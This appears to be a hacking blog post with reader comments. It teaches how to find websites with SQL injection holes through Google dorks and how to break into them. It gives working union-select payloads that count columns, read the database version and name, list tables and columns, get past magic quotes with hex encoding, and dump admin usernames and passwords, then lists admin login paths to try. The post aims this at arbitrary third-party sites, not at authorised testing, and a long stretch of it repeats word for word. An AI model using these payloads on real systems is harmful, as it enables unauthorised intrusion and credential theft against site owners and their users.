Here are some dork (By Searching these in http://google.com You will find vulnerbility webs)
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
you can also make your own dorks
How to Check web is vulnerability for SQL Injection????
To check if a site is vulnerable to SQL injection just put a ' in the end of the url like this:http://www.site.com/index.php?id=1'
How to Check web is vulnerability for SQL Injection????
To check if a site is vulnerable to SQL injection just put a ' in the end of the url like this:http://www.site.com/index.php?id=1'
If the site shows you an error it is vulnerable to SQLi
As show in fig
Lets say we found a vulnerable site as show in above fig.
First we need to find out how many columns there is in the database. To do so we will use this query "order by"
http://www.site.com/index.php?id=1 order by 1-- (No error)http://www.site.com/index.php?id=1 order by 2-- (No error)
http://www.site.com/index.php?id=1 order by 3-- (No error)
And we will keep increasing the number until we get an error.http://www.site.com/index.php?id=1 order by 5-- (No error)
http://www.site.com/index.php?id=1 order by 7-- (No error)
http://www.site.com/index.php?id=1 order by 8-- (Error)
Lets say there is 7 columns in the database.
Now we need to find out which columns that are vulnerable to SQL injection. To do so we will use this query
"union select"
http://www.site.com/index.php?id=-1 union select 1,2,3,4,5,6,7--
Btw notice that i put a single - in front of the id number (id=-1)
Since there is no page with the id -1 it simply put just clears the sites text for us. That makes it easier for us to find the data that we are looking for.
Okay lets say the numbers 3, and 5 popped up on the site. These are the vulnerable tables or valid string (from where we can get data) Now we wanna find the version of the database. To do so we will use this query "@@version" (in either 5 of the vulnerable tables but i chose 3 for this example)
http://www.site.com/index.php?id=-1 union select 1,2,@@version,4,5,6,7--
And if that doesn't work then try this 1http://www.site.com/index.php?id=-1 union select 1,2,version(),4,5,6,7--
Now we want to get the name of the database so we will use this query "concat(database())"
http://www.site.com/index.php?id=-1 union select 1,2,concat(database()),4,5,6,7--
Write that name down so you wont forget it. Lets say the database name i just extracted was named exampledatabase
If the version is 4 or below, it is probably best that you just move on to another site since you are gonna to guess the tables
If the version is 5 or above then we will use this query to show all the tables
http://www.site.com/index.php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
You can also use these
http://www.site.com/index.php?id=-1 union select 1,2,concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
http://www.site.com/index.php?id=-1 union select 1,2,table_name,4,5,6,7 from information_schema.tables where table_schema=database()--
Now you have the table names. Now you need to look at those tables and find tables like
User(s)
Admin(s)
tbluser(s) / tbl_user(s)
tbladmin(s) / tbl_admin(s)
Once you have found the table you think has the information you want, we will use this query (In this example i use admin)
http://www.site.com/index.php?id=-1 union select 1,2,column_name,4,5,6,7 from information_schema.columns where table_name="admin"--
If the site shows you an error then its means is that Magic Quotes is turned on. To bypass this we need to convert the text "admin" into hex.
To do this:
Copy the name of the table you are trying to access.
visit the site http://www.swingnote.com/tools/texttohex.php
Paste the name into the website where it says "Say Hello To My Little Friend".
Click Convert
Copy the hex into your query like this.
Quote:
http://www.site.com/index.php?id=-1 union select 1,2,column_name,4,5,6,7 from information_schema.columns where table_name=0x61646d696e--
Notice the 0x before the hex string. This is to tell the server that the next part is a hex string.
You should now see all the columns inside the table.
Now, once again you will have to spot the columns we want see the contents
Lets say there are 2 columns called username and password. In order to see what are inside of those columns we will use this query:
http://www.site.com/index.php?id=-1 union select 1,2,group_concat(username,0x3a,password),4,5,6,7 from exampledatabase.admin--
Now you have the admin login!
And now we have to find the admin login.
to do so, once again you can use havij for that, or you can search for it manually. If you wanna search manually you can try pages like these:
http://www.site.com/admin.php
http://www.site.com/admin.asp
http://www.site.com/admin/
http://www.site.com/adminlogin.php
http://www.site.com/adminlogin.asp
http://www.site.com/adminlogin/
http://www.site.com/login.php
http://www.site.com/login.asp
http://www.site.com/login/
http://www.site.com/index.php?id=-1 union select 1,2,3,4,5,6,7--
Btw notice that i put a single - in front of the id number (id=-1)
Since there is no page with the id -1 it simply put just clears the sites text for us. That makes it easier for us to find the data that we are looking for.
Okay lets say the numbers 3, and 5 popped up on the site. These are the vulnerable tables or valid string (from where we can get data) Now we wanna find the version of the database. To do so we will use this query "@@version" (in either 5 of the vulnerable tables but i chose 3 for this example)
http://www.site.com/index.php?id=-1 union select 1,2,@@version,4,5,6,7--
And if that doesn't work then try this 1http://www.site.com/index.php?id=-1 union select 1,2,version(),4,5,6,7--
Now we want to get the name of the database so we will use this query "concat(database())"
http://www.site.com/index.php?id=-1 union select 1,2,concat(database()),4,5,6,7--
Write that name down so you wont forget it. Lets say the database name i just extracted was named exampledatabase
If the version is 4 or below, it is probably best that you just move on to another site since you are gonna to guess the tables
If the version is 5 or above then we will use this query to show all the tables
http://www.site.com/index.php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
You can also use these
http://www.site.com/index.php?id=-1 union select 1,2,concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
http://www.site.com/index.php?id=-1 union select 1,2,table_name,4,5,6,7 from information_schema.tables where table_schema=database()--
Now you have the table names. Now you need to look at those tables and find tables like
User(s)
Admin(s)
tbluser(s) / tbl_user(s)
tbladmin(s) / tbl_admin(s)
Once you have found the table you think has the information you want, we will use this query (In this example i use admin)
http://www.site.com/index.php?id=-1 union select 1,2,column_name,4,5,6,7 from information_schema.columns where table_name="admin"--
If the site shows you an error then its means is that Magic Quotes is turned on. To bypass this we need to convert the text "admin" into hex.
To do this:
Copy the name of the table you are trying to access.
visit the site http://www.swingnote.com/tools/texttohex.php
Paste the name into the website where it says "Say Hello To My Little Friend".
Click Convert
Copy the hex into your query like this.
Quote:
http://www.site.com/index.php?id=-1 union select 1,2,column_name,4,5,6,7 from information_schema.columns where table_name=0x61646d696e--
Notice the 0x before the hex string. This is to tell the server that the next part is a hex string.
You should now see all the columns inside the table.
Now, once again you will have to spot the columns we want see the contents
Lets say there are 2 columns called username and password. In order to see what are inside of those columns we will use this query:
http://www.site.com/index.php?id=-1 union select 1,2,group_concat(username,0x3a,password),4,5,6,7 from exampledatabase.admin--
Now you have the admin login!
And now we have to find the admin login.
to do so, once again you can use havij for that, or you can search for it manually. If you wanna search manually you can try pages like these:
http://www.site.com/admin.php
http://www.site.com/admin.asp
http://www.site.com/admin/
http://www.site.com/adminlogin.php
http://www.site.com/adminlogin.asp
http://www.site.com/adminlogin/
http://www.site.com/login.php
http://www.site.com/login.asp
http://www.site.com/login/
If you have any question or any suggestion then leave a comment
2 comments:
Thanks for the info. Please where can we type those commands is it in the browser or in the database.
Yes you have to type these command in address bar if you are new in web exploiting then SQLI is best also download my video tutorial on SQL Injection http://h4ckcorner.blogspot.com/2011/09/sql-injection-video-tutorial-by.html
Soon i will write Auto SQLI, SQLI With Havij, Blind SQLI and much more keep visiting my blog and comment if u need any thing more
Post a Comment